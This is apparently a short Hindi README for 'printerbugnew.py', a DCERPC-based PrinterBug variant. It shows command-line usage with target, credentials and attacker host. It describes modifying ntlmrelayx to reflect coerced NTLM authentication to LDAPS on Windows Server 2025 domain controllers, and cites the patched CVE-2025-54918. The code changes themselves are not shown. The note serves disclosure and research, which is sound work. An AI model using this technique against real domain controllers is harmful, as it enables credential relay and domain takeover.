
केवल DCERPC वाला printerbug.py संस्करण
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

यह रिफ्लेक्शन के माध्यम से शोषण केवल W2025 पर "नए" प्रिंटरबग (नेम्ड पाइप्स के बजाय DCERPC) के साथ काम करता है।
इसे काम करने के लिए आपको ntlmrelayx में कुछ बिंदुओं पर संशोधन करने की आवश्यकता होगी। उसके बाद, आप W2025 DC पर प्रिंटर बग को दूरस्थ रूप से ट्रिगर कर सकते हैं और LDAPS के माध्यम से प्रमाणीकरण को रिफ्लेक्ट कर सकते हैं (!), भले ही चैनल बाइंडिंग आवश्यक हो।
ldaprelayclient.py:

rpcrelayserver.py
और रिले ;)

यह कमजोरी सितंबर 2025 पैच मंगलवार में ठीक की गई: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
फिक्स यह सुनिश्चित करता है कि MIC की गणना हमेशा की जाए, भले ही टाइप 3 संदेश खाली हो।
इस CVE के लेखक को एक मूल्यवान संकेत के लिए धन्यवाद :)